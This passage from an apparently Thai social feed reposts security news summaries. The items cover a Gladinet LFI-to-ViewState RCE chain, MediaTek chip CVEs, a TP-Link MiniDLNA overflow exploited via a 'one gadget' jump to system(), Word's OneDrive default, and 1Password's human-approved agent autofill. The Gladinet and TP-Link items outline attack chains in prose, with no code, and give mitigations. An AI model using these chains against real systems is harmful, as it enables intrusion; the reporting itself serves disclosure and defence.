ถูกเรียกใช้เป็น child process ของ web server ซึ่งเป็นสัญญาณของการโจมตีหลังการ deserialization แม้ช่องโหว่ CVE-2025-30406 จะถูกแก้ไขไปแล้วในเวอร์ชันใหม่ของ CentreStack แต่ช่องโหว่ CVE-2025-11371 กลับเปิดทางให้แฮกเกอร์ใช้ช่องโหว่เก่าได้อีกครั้งผ่านการดึง machine key ทำให้การโจมตีมีประสิทธิภาพสูงและยากต่อการตรวจจับ ขณะนี้ยังไม่มี patch อย่างเป็นทางการจาก Gladinet แต่ Huntress ได้เสนอวิธีแก้ไขชั่วคราว โดยให้ผู้ดูแลระบบเข้าไปลบ handler ที่ชื่อ t.dn ในไฟล์ Web.config ของ UploadDownloadProxy เพื่อปิดช่องทางการเข้าถึงที่ใช้ในการโจมตี ✅ ข้อมูลสำคัญจากข่าว ➡️ ช่องโหว่ CVE-2025-11371 เป็นแบบ Local File Inclusion (LFI) ใน Gladinet CentreStack และ Triofox ➡️ ผู้โจมตีสามารถดึงไฟล์ Web.config เพื่อขโมย machine key โดยไม่ต้อง login ➡️ ใช้ machine key เพื่อรันโค้ดผ่านช่องโหว่ ViewState deserialization (CVE-2025-30406) ➡️ Huntress ตรวจพบการโจมตีจริงใน 3 องค์กรแล้ว ➡️ การโจมตีเริ่มจาก payload base64 ที่รันเป็น child process ของ web server ➡️ ช่องโหว่ CVE-2025-30406 เคยถูกแก้ไขแล้ว แต่ถูกนำกลับมาใช้ผ่านช่องโหว่ใหม่ ➡️ ยังไม่มี patch อย่างเป็นทางการจาก Gladinet ➡️ Huntress แนะนำให้ลบ handler t.dn ใน Web.config เพื่อปิดช่องทางการโจมตี ✅ ข้อมูลเสริมจากภายนอก ➡️ ViewState เป็นกลไกของ ASP.NET ที่ใช้เก็บสถานะของหน้าเว็บ ➡️ Deserialization คือการแปลงข้อมูลกลับเป็น object ซึ่งหากไม่ปลอดภัยอาจถูกใช้โจมตี ➡️ LFI เป็นช่องโหว่ที่เปิดให้ผู้โจมตีอ่านไฟล์ในระบบโดยไม่ต้องมีสิทธิ์ ➡️ Machine key ใช้ในการเข้ารหัสข้อมูลสำคัญ เช่น session และ ViewState ➡️ การโจมตีแบบนี้สามารถใช้เพื่อฝังมัลแวร์หรือเปิด backdoor บนเซิร์ฟเวอร์ https://securityonline.info/exploited-zero-day-gladinet-triofox-flaw-cve-2025-11371-allows-rce-via-lfi/
    SECURITYONLINE.INFO
    Exploited Zero-Day: Gladinet/Triofox Flaw CVE-2025-11371 Allows RCE via LFI
    A Zero-Day LFI flaw (CVE-2025-11371) in Gladinet/Triofox is being actively exploited. Attackers retrieve the Web.config machine key to chain into an unauthenticated RCE exploit.
    0 ความคิดเห็น 0 การแบ่งปัน 4 มุมมอง 0 รีวิว
  • “MediaTek แจ้งเตือนช่องโหว่ร้ายแรงในชิป Wi-Fi และ GNSS — เสี่ยงถูกโจมตีจากระยะไกลผ่านคลื่นสัญญาณ”

    MediaTek ได้ออกประกาศ Product Security Bulletin ประจำเดือนตุลาคม 2025 โดยเปิดเผยช่องโหว่ความปลอดภัยระดับสูงและระดับกลางหลายรายการที่ส่งผลกระทบต่อชิปเซ็ต Wi-Fi (WLAN) และ GNSS (Global Navigation Satellite System) ที่ใช้ในอุปกรณ์ผู้บริโภคและ IoT ทั่วโลก

    ในส่วนของชิป Wi-Fi พบช่องโหว่ buffer overflow, heap overflow และ stack overflow หลายรายการ เช่น CVE-2025-20712, CVE-2025-20709, CVE-2025-20710 และ CVE-2025-20718 ซึ่งเกิดจากการตรวจสอบขอบเขตข้อมูลไม่ถูกต้อง ทำให้ผู้โจมตีสามารถเขียนข้อมูลเกินขอบเขตหน่วยความจำ และอาจนำไปสู่การรันโค้ดโดยไม่ได้รับอนุญาต หรือทำให้ระบบล่มได้

    ชิปที่ได้รับผลกระทบ ได้แก่ MT6890, MT7915, MT7916, MT7981, MT7986 และรุ่นใหม่อย่าง MT7990–MT7993 รวมถึงชิปรุ่นเก่าอย่าง MT7603 และ MT7622 ซึ่งยังคงใช้งานในอุปกรณ์หลายประเภท

    ในส่วนของ GNSS และ image sensor ก็พบช่องโหว่ระดับกลาง เช่น CVE-2025-20722 และ CVE-2025-20723 ที่เกิดจาก integer overflow และ out-of-bounds write ในการจัดการข้อมูลพิกัดและการแก้ไขข้อผิดพลาด ซึ่งอาจทำให้ระบบอ่านข้อมูลผิดพลาดหรือถูกโจมตีผ่านข้อมูลที่สร้างขึ้นโดยเจตนา

    MediaTek ระบุว่าได้แจ้งผู้ผลิตอุปกรณ์ (OEM) ล่วงหน้าก่อนเผยแพร่ประกาศนี้ และแนะนำให้ผู้ใช้ตรวจสอบว่าอุปกรณ์ได้รับการอัปเดต firmware ล่าสุดจากผู้ผลิตแล้ว เพื่อป้องกันการถูกโจมตีจากช่องโหว่เหล่านี้

    ข้อมูลสำคัญจากข่าว
    MediaTek ออกประกาศแจ้งเตือนช่องโหว่ในชิป Wi-Fi และ GNSS ประจำเดือนตุลาคม 2025
    ช่องโหว่ระดับสูงใน Wi-Fi ได้แก่ buffer overflow, heap overflow และ stack overflow
    CVE-2025-20712, CVE-2025-20709, CVE-2025-20710, CVE-2025-20718 เป็นช่องโหว่หลัก
    ชิปที่ได้รับผลกระทบ ได้แก่ MT6890, MT7915, MT7916, MT7981, MT7986, MT7990–MT7993
    ช่องโหว่ GNSS ได้แก่ CVE-2025-20722 และ CVE-2025-20723 เกิดจาก integer overflow
    ช่องโหว่ใน image sensor ได้แก่ CVE-2025-20721 ส่งผลต่อ MT6886, MT6899, MT8195, MT8793
    MediaTek แจ้ง OEM ล่วงหน้าและแนะนำให้ผู้ใช้ติดตั้ง firmware ล่าสุด

    ข้อมูลเสริมจากภายนอก
    ช่องโหว่ buffer overflow เป็นหนึ่งในวิธีโจมตีที่ใช้กันมากที่สุดในระบบ embedded
    GNSS เป็นระบบที่ใช้ในสมาร์ตโฟนและรถยนต์สำหรับระบุตำแหน่ง
    การโจมตีผ่าน Wi-Fi สามารถทำได้จากระยะไกลโดยไม่ต้องเข้าถึงตัวอุปกรณ์
    การอัปเดต firmware เป็นวิธีหลักในการป้องกันช่องโหว่ในอุปกรณ์ IoT
    CVSS v3.1 เป็นมาตรฐานที่ใช้ในการประเมินความรุนแรงของช่องโหว่

    https://securityonline.info/mediatek-issues-october-2025-security-bulletin-addressing-multiple-high-severity-vulnerabilities-across-wi-fi-and-gnss-chipsets/
    📡 “MediaTek แจ้งเตือนช่องโหว่ร้ายแรงในชิป Wi-Fi และ GNSS — เสี่ยงถูกโจมตีจากระยะไกลผ่านคลื่นสัญญาณ” MediaTek ได้ออกประกาศ Product Security Bulletin ประจำเดือนตุลาคม 2025 โดยเปิดเผยช่องโหว่ความปลอดภัยระดับสูงและระดับกลางหลายรายการที่ส่งผลกระทบต่อชิปเซ็ต Wi-Fi (WLAN) และ GNSS (Global Navigation Satellite System) ที่ใช้ในอุปกรณ์ผู้บริโภคและ IoT ทั่วโลก ในส่วนของชิป Wi-Fi พบช่องโหว่ buffer overflow, heap overflow และ stack overflow หลายรายการ เช่น CVE-2025-20712, CVE-2025-20709, CVE-2025-20710 และ CVE-2025-20718 ซึ่งเกิดจากการตรวจสอบขอบเขตข้อมูลไม่ถูกต้อง ทำให้ผู้โจมตีสามารถเขียนข้อมูลเกินขอบเขตหน่วยความจำ และอาจนำไปสู่การรันโค้ดโดยไม่ได้รับอนุญาต หรือทำให้ระบบล่มได้ ชิปที่ได้รับผลกระทบ ได้แก่ MT6890, MT7915, MT7916, MT7981, MT7986 และรุ่นใหม่อย่าง MT7990–MT7993 รวมถึงชิปรุ่นเก่าอย่าง MT7603 และ MT7622 ซึ่งยังคงใช้งานในอุปกรณ์หลายประเภท ในส่วนของ GNSS และ image sensor ก็พบช่องโหว่ระดับกลาง เช่น CVE-2025-20722 และ CVE-2025-20723 ที่เกิดจาก integer overflow และ out-of-bounds write ในการจัดการข้อมูลพิกัดและการแก้ไขข้อผิดพลาด ซึ่งอาจทำให้ระบบอ่านข้อมูลผิดพลาดหรือถูกโจมตีผ่านข้อมูลที่สร้างขึ้นโดยเจตนา MediaTek ระบุว่าได้แจ้งผู้ผลิตอุปกรณ์ (OEM) ล่วงหน้าก่อนเผยแพร่ประกาศนี้ และแนะนำให้ผู้ใช้ตรวจสอบว่าอุปกรณ์ได้รับการอัปเดต firmware ล่าสุดจากผู้ผลิตแล้ว เพื่อป้องกันการถูกโจมตีจากช่องโหว่เหล่านี้ ✅ ข้อมูลสำคัญจากข่าว ➡️ MediaTek ออกประกาศแจ้งเตือนช่องโหว่ในชิป Wi-Fi และ GNSS ประจำเดือนตุลาคม 2025 ➡️ ช่องโหว่ระดับสูงใน Wi-Fi ได้แก่ buffer overflow, heap overflow และ stack overflow ➡️ CVE-2025-20712, CVE-2025-20709, CVE-2025-20710, CVE-2025-20718 เป็นช่องโหว่หลัก ➡️ ชิปที่ได้รับผลกระทบ ได้แก่ MT6890, MT7915, MT7916, MT7981, MT7986, MT7990–MT7993 ➡️ ช่องโหว่ GNSS ได้แก่ CVE-2025-20722 และ CVE-2025-20723 เกิดจาก integer overflow ➡️ ช่องโหว่ใน image sensor ได้แก่ CVE-2025-20721 ส่งผลต่อ MT6886, MT6899, MT8195, MT8793 ➡️ MediaTek แจ้ง OEM ล่วงหน้าและแนะนำให้ผู้ใช้ติดตั้ง firmware ล่าสุด ✅ ข้อมูลเสริมจากภายนอก ➡️ ช่องโหว่ buffer overflow เป็นหนึ่งในวิธีโจมตีที่ใช้กันมากที่สุดในระบบ embedded ➡️ GNSS เป็นระบบที่ใช้ในสมาร์ตโฟนและรถยนต์สำหรับระบุตำแหน่ง ➡️ การโจมตีผ่าน Wi-Fi สามารถทำได้จากระยะไกลโดยไม่ต้องเข้าถึงตัวอุปกรณ์ ➡️ การอัปเดต firmware เป็นวิธีหลักในการป้องกันช่องโหว่ในอุปกรณ์ IoT ➡️ CVSS v3.1 เป็นมาตรฐานที่ใช้ในการประเมินความรุนแรงของช่องโหว่ https://securityonline.info/mediatek-issues-october-2025-security-bulletin-addressing-multiple-high-severity-vulnerabilities-across-wi-fi-and-gnss-chipsets/
    SECURITYONLINE.INFO
    MediaTek Issues October 2025 Security Bulletin Addressing Multiple High-Severity Vulnerabilities Across Wi-Fi and GNSS Chipsets
    MediaTek's October Security Bulletin discloses multiple High-severity flaws in its WLAN and GNSS chipsets, including buffer and stack overflows that risk RCE via memory corruption.
    0 ความคิดเห็น 0 การแบ่งปัน 5 มุมมอง 0 รีวิว
  • “พบช่องโหว่ร้ายแรงในเราเตอร์ TP-Link AX1800 — แฮกเกอร์บน LAN เข้าควบคุมระบบแบบ root ได้ทันที”

    นักวิจัยด้านความปลอดภัย Rocco Calvi ได้เปิดเผยช่องโหว่ระดับสูงในเราเตอร์ TP-Link AX1800 WiFi 6 รุ่น Archer AX21 และ AX20 ซึ่งเปิดทางให้ผู้โจมตีที่อยู่ในเครือข่ายเดียวกันสามารถรันคำสั่งในระดับ root ได้โดยไม่ต้องยืนยันตัวตน ช่องโหว่นี้ถูกระบุเป็น CVE-2023-28760 และได้รับคะแนน CVSS 7.5 (ระดับสูง)

    ช่องโหว่เกิดจากบริการ MiniDLNA ที่ใช้สำหรับแชร์ไฟล์มีเดียผ่าน USB ซึ่งเมื่อผู้ใช้เสียบ USB เพื่อเปิดใช้งานฟีเจอร์ Media Sharing ระบบจะเปิดบริการ Samba, FTP และ MiniDLNA โดยอัตโนมัติ ทำให้ผู้โจมตีสามารถเข้าถึงไฟล์ฐานข้อมูล .TPDLNA/files.db ผ่าน SMB หรือ FTP ได้

    จุดอ่อนอยู่ที่การตรวจสอบขอบเขตข้อมูลในไฟล์ upnpsoap.c ของ MiniDLNA ซึ่งมีการคัดลอกข้อมูล metadata ไปยัง buffer แบบ fixed-size โดยไม่มีการตรวจสอบขนาดอย่างเหมาะสม หากผู้โจมตีใส่ข้อมูลในฟิลด์ dlna_pn ที่เกินขนาด buffer จะเกิด buffer overflow และสามารถนำไปสู่การรันคำสั่งแบบ root ได้

    นักวิจัยสามารถใช้เทคนิค “one gadget” เพื่อหลบเลี่ยงการป้องกันของระบบ เช่น ASLR และ NX bit โดยเปลี่ยนทิศทางการทำงานของระบบไปยังฟังก์ชัน system() ใน firmware ของเราเตอร์ และได้แสดงการโจมตีจริงในงาน Pwn2Own โดยสามารถเปิด shell แบบ interactive บนเราเตอร์ได้สำเร็จ

    TP-Link ได้รับแจ้งตามกระบวนการ responsible disclosure และได้ออก firmware เวอร์ชัน Archer AX20(EU)_V3_1.1.4 Build 20230219 เพื่อแก้ไขช่องโหว่นี้แล้ว

    ข้อมูลสำคัญจากข่าว
    ช่องโหว่ CVE-2023-28760 ส่งผลต่อ TP-Link AX1800 WiFi 6 รุ่น Archer AX21 และ AX20
    ผู้โจมตีบน LAN สามารถรันคำสั่งแบบ root ได้โดยไม่ต้องยืนยันตัวตน
    ช่องโหว่เกิดจากบริการ MiniDLNA ที่เปิดเมื่อเสียบ USB เพื่อแชร์ไฟล์
    ผู้โจมตีสามารถแก้ไขไฟล์ .TPDLNA/files.db ผ่าน SMB หรือ FTP
    เกิด buffer overflow จากการคัดลอกข้อมูล dlna_pn ที่เกินขนาด buffer
    ใช้เทคนิค “one gadget” เพื่อหลบเลี่ยง ASLR และ NX bit
    นักวิจัยแสดงการโจมตีจริงในงาน Pwn2Own และเปิด shell บนเราเตอร์ได้
    TP-Link ออก firmware เวอร์ชันใหม่เพื่อแก้ไขช่องโหว่แล้ว

    ข้อมูลเสริมจากภายนอก
    MiniDLNA เป็นบริการแชร์มีเดียที่นิยมใช้ในเราเตอร์สำหรับบ้าน
    ASLR และ NX bit เป็นเทคนิคป้องกันการโจมตีแบบ buffer overflow
    “one gadget” คือการใช้คำสั่งเดียวเพื่อเปลี่ยน flow ของโปรแกรมไปยังจุดเป้าหมาย
    Pwn2Own เป็นงานแข่งขันด้าน cybersecurity ที่แสดงการโจมตีจริงอย่างปลอดภัย
    การใช้ USB เพื่อแชร์ไฟล์ในบ้านเป็นการตั้งค่าที่พบได้ทั่วไป

    https://securityonline.info/tp-link-router-flaw-cve-2023-28760-allows-root-rce-via-lan-poc-available/
    🛡️ “พบช่องโหว่ร้ายแรงในเราเตอร์ TP-Link AX1800 — แฮกเกอร์บน LAN เข้าควบคุมระบบแบบ root ได้ทันที” นักวิจัยด้านความปลอดภัย Rocco Calvi ได้เปิดเผยช่องโหว่ระดับสูงในเราเตอร์ TP-Link AX1800 WiFi 6 รุ่น Archer AX21 และ AX20 ซึ่งเปิดทางให้ผู้โจมตีที่อยู่ในเครือข่ายเดียวกันสามารถรันคำสั่งในระดับ root ได้โดยไม่ต้องยืนยันตัวตน ช่องโหว่นี้ถูกระบุเป็น CVE-2023-28760 และได้รับคะแนน CVSS 7.5 (ระดับสูง) ช่องโหว่เกิดจากบริการ MiniDLNA ที่ใช้สำหรับแชร์ไฟล์มีเดียผ่าน USB ซึ่งเมื่อผู้ใช้เสียบ USB เพื่อเปิดใช้งานฟีเจอร์ Media Sharing ระบบจะเปิดบริการ Samba, FTP และ MiniDLNA โดยอัตโนมัติ ทำให้ผู้โจมตีสามารถเข้าถึงไฟล์ฐานข้อมูล .TPDLNA/files.db ผ่าน SMB หรือ FTP ได้ จุดอ่อนอยู่ที่การตรวจสอบขอบเขตข้อมูลในไฟล์ upnpsoap.c ของ MiniDLNA ซึ่งมีการคัดลอกข้อมูล metadata ไปยัง buffer แบบ fixed-size โดยไม่มีการตรวจสอบขนาดอย่างเหมาะสม หากผู้โจมตีใส่ข้อมูลในฟิลด์ dlna_pn ที่เกินขนาด buffer จะเกิด buffer overflow และสามารถนำไปสู่การรันคำสั่งแบบ root ได้ นักวิจัยสามารถใช้เทคนิค “one gadget” เพื่อหลบเลี่ยงการป้องกันของระบบ เช่น ASLR และ NX bit โดยเปลี่ยนทิศทางการทำงานของระบบไปยังฟังก์ชัน system() ใน firmware ของเราเตอร์ และได้แสดงการโจมตีจริงในงาน Pwn2Own โดยสามารถเปิด shell แบบ interactive บนเราเตอร์ได้สำเร็จ TP-Link ได้รับแจ้งตามกระบวนการ responsible disclosure และได้ออก firmware เวอร์ชัน Archer AX20(EU)_V3_1.1.4 Build 20230219 เพื่อแก้ไขช่องโหว่นี้แล้ว ✅ ข้อมูลสำคัญจากข่าว ➡️ ช่องโหว่ CVE-2023-28760 ส่งผลต่อ TP-Link AX1800 WiFi 6 รุ่น Archer AX21 และ AX20 ➡️ ผู้โจมตีบน LAN สามารถรันคำสั่งแบบ root ได้โดยไม่ต้องยืนยันตัวตน ➡️ ช่องโหว่เกิดจากบริการ MiniDLNA ที่เปิดเมื่อเสียบ USB เพื่อแชร์ไฟล์ ➡️ ผู้โจมตีสามารถแก้ไขไฟล์ .TPDLNA/files.db ผ่าน SMB หรือ FTP ➡️ เกิด buffer overflow จากการคัดลอกข้อมูล dlna_pn ที่เกินขนาด buffer ➡️ ใช้เทคนิค “one gadget” เพื่อหลบเลี่ยง ASLR และ NX bit ➡️ นักวิจัยแสดงการโจมตีจริงในงาน Pwn2Own และเปิด shell บนเราเตอร์ได้ ➡️ TP-Link ออก firmware เวอร์ชันใหม่เพื่อแก้ไขช่องโหว่แล้ว ✅ ข้อมูลเสริมจากภายนอก ➡️ MiniDLNA เป็นบริการแชร์มีเดียที่นิยมใช้ในเราเตอร์สำหรับบ้าน ➡️ ASLR และ NX bit เป็นเทคนิคป้องกันการโจมตีแบบ buffer overflow ➡️ “one gadget” คือการใช้คำสั่งเดียวเพื่อเปลี่ยน flow ของโปรแกรมไปยังจุดเป้าหมาย ➡️ Pwn2Own เป็นงานแข่งขันด้าน cybersecurity ที่แสดงการโจมตีจริงอย่างปลอดภัย ➡️ การใช้ USB เพื่อแชร์ไฟล์ในบ้านเป็นการตั้งค่าที่พบได้ทั่วไป https://securityonline.info/tp-link-router-flaw-cve-2023-28760-allows-root-rce-via-lan-poc-available/
    SECURITYONLINE.INFO
    TP-Link Router Flaw CVE-2023-28760 Allows Root RCE via LAN, PoC Available
    A flaw (CVE-2023-28760) in TP-Link AX1800 routers allows unauthenticated attackers on the LAN to gain root RCE by manipulating the MiniDLNA service via a USB drive.
    0 ความคิดเห็น 0 การแบ่งปัน 4 มุมมอง 0 รีวิว
  • “Word for Windows เปลี่ยนเกม! บันทึกเอกสารลง OneDrive โดยอัตโนมัติ — สะดวกขึ้น แต่ผู้ใช้ต้องยอมรับการเปลี่ยนแปลง”

    Microsoft ประกาศการเปลี่ยนแปลงครั้งสำคัญในงานเปิดตัว OneDrive และ Copilot โดยระบุว่า Word for Windows จะเริ่มบันทึกเอกสารใหม่ลง OneDrive โดยอัตโนมัติ พร้อมเปิดใช้งานฟีเจอร์ AutoSave ตั้งแต่เริ่มต้น โดยไม่ต้องให้ผู้ใช้กดบันทึกเองอีกต่อไป

    การเปลี่ยนแปลงนี้เริ่มใช้กับผู้ใช้กลุ่ม Insider แล้ว และจะทยอยปล่อยให้ผู้ใช้ทั่วไปในอนาคต ซึ่งหมายความว่าเมื่อผู้ใช้เปิดเอกสารใหม่ใน Word ระบบจะกำหนดชื่อไฟล์อัตโนมัติ (เช่น Document-2025-10-10) และบันทึกลง OneDrive ทันที โดยไม่ต้องเลือกตำแหน่งจัดเก็บก่อน

    แม้ผู้ใช้ยังสามารถเลือกบันทึกไฟล์ลงเครื่องได้ แต่หากไม่ตั้งค่าเอง Word จะถือว่า OneDrive เป็นตำแหน่งหลัก และแม้จะบันทึกลงเครื่อง ระบบก็ยังสร้างสำเนาในคลาวด์ไว้เสมอ ซึ่งทำให้เวอร์ชันบน OneDrive กลายเป็น “ต้นฉบับ” ส่วนไฟล์ในเครื่องเป็นเพียง “สำเนา”

    Microsoft ระบุว่าแนวทางนี้ช่วยให้ผู้ใช้สามารถเข้าถึงไฟล์ได้จากทุกอุปกรณ์ ป้องกันการสูญหายจากระบบล่ม และเปิดทางให้ฟีเจอร์ AI อย่าง Copilot ทำงานได้เต็มประสิทธิภาพ เช่น การแนะนำเนื้อหา การสรุปเอกสาร และการแก้ไขแบบอัจฉริยะ

    อย่างไรก็ตาม การเปลี่ยนแปลงนี้ก็สร้างคำถามด้านความเป็นส่วนตัวและการควบคุมข้อมูล โดยเฉพาะในองค์กรที่มีข้อกำหนดด้านการจัดเก็บข้อมูลภายใน และผู้ใช้ที่ไม่ต้องการให้เอกสารส่วนตัวถูกอัปโหลดขึ้นคลาวด์โดยอัตโนมัติ

    ข้อมูลสำคัญจากข่าว
    Word for Windows จะบันทึกเอกสารใหม่ลง OneDrive โดยอัตโนมัติ
    ฟีเจอร์ AutoSave จะเปิดใช้งานทันทีตั้งแต่เริ่มสร้างเอกสาร
    เอกสารจะได้รับชื่อไฟล์อัตโนมัติและถูกจัดเก็บในคลาวด์ทันที
    แม้บันทึกลงเครื่อง ระบบยังสร้างสำเนาใน OneDrive เสมอ
    OneDrive ให้พื้นที่ฟรี 5GB และสามารถซื้อเพิ่มหรือสมัคร Microsoft 365
    การเปลี่ยนแปลงนี้เริ่มใช้กับผู้ใช้กลุ่ม Insider แล้ว
    Microsoft เตรียมเปิดตัวแอป OneDrive ใหม่บน Windows 11 พร้อมฟีเจอร์ดูภาพและแก้ไขเร็วขึ้น
    การบันทึกลงคลาวด์ช่วยให้ Copilot ทำงานได้เต็มประสิทธิภาพ

    ข้อมูลเสริมจากภายนอก
    AutoSave เป็นฟีเจอร์ที่ช่วยลดความเสี่ยงจากการลืมบันทึกหรือระบบล่ม
    Copilot ใช้ข้อมูลจากเอกสารเพื่อช่วยสรุป แก้ไข และแนะนำเนื้อหา
    การบันทึกลงคลาวด์ช่วยให้สามารถทำงานร่วมกันแบบ real-time ได้
    การใช้ OneDrive เป็นตำแหน่งหลักช่วยให้มี version history และการกู้คืนไฟล์
    Microsoft 365 Family และ Personal ให้พื้นที่ OneDrive สูงสุดถึง 1TB

    https://securityonline.info/word-for-windows-will-soon-autosave-documents-to-onedrive-by-default-pushing-cloud-adoption/
    ☁️ “Word for Windows เปลี่ยนเกม! บันทึกเอกสารลง OneDrive โดยอัตโนมัติ — สะดวกขึ้น แต่ผู้ใช้ต้องยอมรับการเปลี่ยนแปลง” Microsoft ประกาศการเปลี่ยนแปลงครั้งสำคัญในงานเปิดตัว OneDrive และ Copilot โดยระบุว่า Word for Windows จะเริ่มบันทึกเอกสารใหม่ลง OneDrive โดยอัตโนมัติ พร้อมเปิดใช้งานฟีเจอร์ AutoSave ตั้งแต่เริ่มต้น โดยไม่ต้องให้ผู้ใช้กดบันทึกเองอีกต่อไป การเปลี่ยนแปลงนี้เริ่มใช้กับผู้ใช้กลุ่ม Insider แล้ว และจะทยอยปล่อยให้ผู้ใช้ทั่วไปในอนาคต ซึ่งหมายความว่าเมื่อผู้ใช้เปิดเอกสารใหม่ใน Word ระบบจะกำหนดชื่อไฟล์อัตโนมัติ (เช่น Document-2025-10-10) และบันทึกลง OneDrive ทันที โดยไม่ต้องเลือกตำแหน่งจัดเก็บก่อน แม้ผู้ใช้ยังสามารถเลือกบันทึกไฟล์ลงเครื่องได้ แต่หากไม่ตั้งค่าเอง Word จะถือว่า OneDrive เป็นตำแหน่งหลัก และแม้จะบันทึกลงเครื่อง ระบบก็ยังสร้างสำเนาในคลาวด์ไว้เสมอ ซึ่งทำให้เวอร์ชันบน OneDrive กลายเป็น “ต้นฉบับ” ส่วนไฟล์ในเครื่องเป็นเพียง “สำเนา” Microsoft ระบุว่าแนวทางนี้ช่วยให้ผู้ใช้สามารถเข้าถึงไฟล์ได้จากทุกอุปกรณ์ ป้องกันการสูญหายจากระบบล่ม และเปิดทางให้ฟีเจอร์ AI อย่าง Copilot ทำงานได้เต็มประสิทธิภาพ เช่น การแนะนำเนื้อหา การสรุปเอกสาร และการแก้ไขแบบอัจฉริยะ อย่างไรก็ตาม การเปลี่ยนแปลงนี้ก็สร้างคำถามด้านความเป็นส่วนตัวและการควบคุมข้อมูล โดยเฉพาะในองค์กรที่มีข้อกำหนดด้านการจัดเก็บข้อมูลภายใน และผู้ใช้ที่ไม่ต้องการให้เอกสารส่วนตัวถูกอัปโหลดขึ้นคลาวด์โดยอัตโนมัติ ✅ ข้อมูลสำคัญจากข่าว ➡️ Word for Windows จะบันทึกเอกสารใหม่ลง OneDrive โดยอัตโนมัติ ➡️ ฟีเจอร์ AutoSave จะเปิดใช้งานทันทีตั้งแต่เริ่มสร้างเอกสาร ➡️ เอกสารจะได้รับชื่อไฟล์อัตโนมัติและถูกจัดเก็บในคลาวด์ทันที ➡️ แม้บันทึกลงเครื่อง ระบบยังสร้างสำเนาใน OneDrive เสมอ ➡️ OneDrive ให้พื้นที่ฟรี 5GB และสามารถซื้อเพิ่มหรือสมัคร Microsoft 365 ➡️ การเปลี่ยนแปลงนี้เริ่มใช้กับผู้ใช้กลุ่ม Insider แล้ว ➡️ Microsoft เตรียมเปิดตัวแอป OneDrive ใหม่บน Windows 11 พร้อมฟีเจอร์ดูภาพและแก้ไขเร็วขึ้น ➡️ การบันทึกลงคลาวด์ช่วยให้ Copilot ทำงานได้เต็มประสิทธิภาพ ✅ ข้อมูลเสริมจากภายนอก ➡️ AutoSave เป็นฟีเจอร์ที่ช่วยลดความเสี่ยงจากการลืมบันทึกหรือระบบล่ม ➡️ Copilot ใช้ข้อมูลจากเอกสารเพื่อช่วยสรุป แก้ไข และแนะนำเนื้อหา ➡️ การบันทึกลงคลาวด์ช่วยให้สามารถทำงานร่วมกันแบบ real-time ได้ ➡️ การใช้ OneDrive เป็นตำแหน่งหลักช่วยให้มี version history และการกู้คืนไฟล์ ➡️ Microsoft 365 Family และ Personal ให้พื้นที่ OneDrive สูงสุดถึง 1TB https://securityonline.info/word-for-windows-will-soon-autosave-documents-to-onedrive-by-default-pushing-cloud-adoption/
    SECURITYONLINE.INFO
    Word for Windows Will Soon AutoSave Documents to OneDrive by Default, Pushing Cloud Adoption
    Microsoft Word's Windows preview build will now default to OneDrive and AutoSave for new documents, mirroring Microsoft's broader strategy to drive cloud storage and synchronization.
    0 ความคิดเห็น 0 การแบ่งปัน 1 มุมมอง 0 รีวิว
  • “1Password เปิดตัว Secure Agentic Autofill — ป้องกันรหัสผ่านจาก AI ด้วยระบบอนุมัติแบบมนุษย์”

    ในยุคที่ AI agents เริ่มทำงานแทนมนุษย์ในเบราว์เซอร์ ตั้งแต่จองตั๋ว ไปจนถึงจัดการบัญชีผู้ใช้ ความสะดวกนี้กลับมาพร้อมความเสี่ยงด้านความปลอดภัย โดยเฉพาะเมื่อ AI สามารถเข้าถึงรหัสผ่านที่จัดเก็บไว้ใน password manager ได้โดยตรง

    เพื่อรับมือกับความเสี่ยงนี้ 1Password ได้เปิดตัวฟีเจอร์ใหม่ชื่อว่า “Secure Agentic Autofill” ซึ่งเป็นระบบที่ออกแบบมาเพื่อป้องกันไม่ให้ AI agents เข้าถึงข้อมูล credential โดยไม่ได้รับอนุญาตจากมนุษย์ก่อน

    หลักการทำงานคือ เมื่อ AI agent ต้องการกรอกข้อมูลเข้าสู่ระบบใด ๆ มันจะส่งคำขอไปยัง 1Password ซึ่งจะตรวจสอบ credential ที่เกี่ยวข้อง และแสดงหน้าต่างขออนุมัติจากผู้ใช้ผ่าน Touch ID, PIN หรือวิธีการยืนยันตัวตนอื่น ๆ เมื่อผู้ใช้อนุมัติแล้ว ระบบจะส่งข้อมูลเข้าสู่เบราว์เซอร์ผ่านช่องทางเข้ารหัสแบบ end-to-end โดยที่ AI agent ไม่สามารถเห็นหรือจัดเก็บรหัสผ่านได้เลย

    ฟีเจอร์นี้เปิดให้ใช้งานแบบ early access ผ่าน Browserbase ซึ่งเป็นแพลตฟอร์มสำหรับการสร้างและควบคุม AI agents ในเบราว์เซอร์ โดยนักพัฒนาสามารถเชื่อมต่อ vault ของ 1Password และกำหนดว่า agent ใดสามารถเข้าถึง credential ใดได้บ้าง

    แม้ระบบนี้จะเพิ่มความปลอดภัยอย่างมาก แต่ก็มีข้อแลกเปลี่ยนคือ ผู้ใช้ต้องอยู่เพื่ออนุมัติการกรอกข้อมูลทุกครั้ง ซึ่งอาจขัดกับแนวคิดของการทำงานอัตโนมัติเต็มรูปแบบ

    ข้อมูลสำคัญจากข่าว
    1Password เปิดตัวฟีเจอร์ Secure Agentic Autofill เพื่อป้องกัน AI agents เข้าถึงรหัสผ่าน
    ระบบใช้การอนุมัติจากมนุษย์ก่อนส่ง credential เข้าสู่เบราว์เซอร์
    การอนุมัติทำผ่าน Touch ID, PIN หรือวิธีการยืนยันตัวตนอื่น ๆ
    ข้อมูลถูกส่งผ่านช่องทางเข้ารหัสแบบ end-to-end โดยที่ AI agent ไม่เห็นรหัสผ่าน
    ฟีเจอร์เปิดให้ใช้งานผ่าน Browserbase สำหรับนักพัฒนา AI agent
    ผู้ใช้สามารถกำหนดว่า agent ใดเข้าถึง credential ใดได้บ้าง
    ระบบมี audit log เพื่อบันทึกว่า credential ถูกใช้เมื่อใดและอย่างไร

    ข้อมูลเสริมจากภายนอก
    Browserbase เป็นแพลตฟอร์มสำหรับสร้าง AI agent ที่ทำงานในเบราว์เซอร์
    AI agents เริ่มถูกใช้ในงานจริง เช่น การจัดซื้อ การ onboarding และการบริการลูกค้า
    ระบบ “human-in-the-loop” เป็นแนวทางที่นิยมในงาน AI ที่ต้องการความปลอดภัยสูง
    การใช้ credential แบบ just-in-time ช่วยลดความเสี่ยงจากการเก็บข้อมูลไว้ในระบบ
    การแยกตัวตนของ AI agent กับผู้ใช้จริงเป็นหัวใจของการรักษาความปลอดภัยในระบบอัตโนมัติ

    https://securityonline.info/1password-launches-secure-agentic-autofill-with-human-in-the-loop-to-protect-credentials-from-ai-agents/
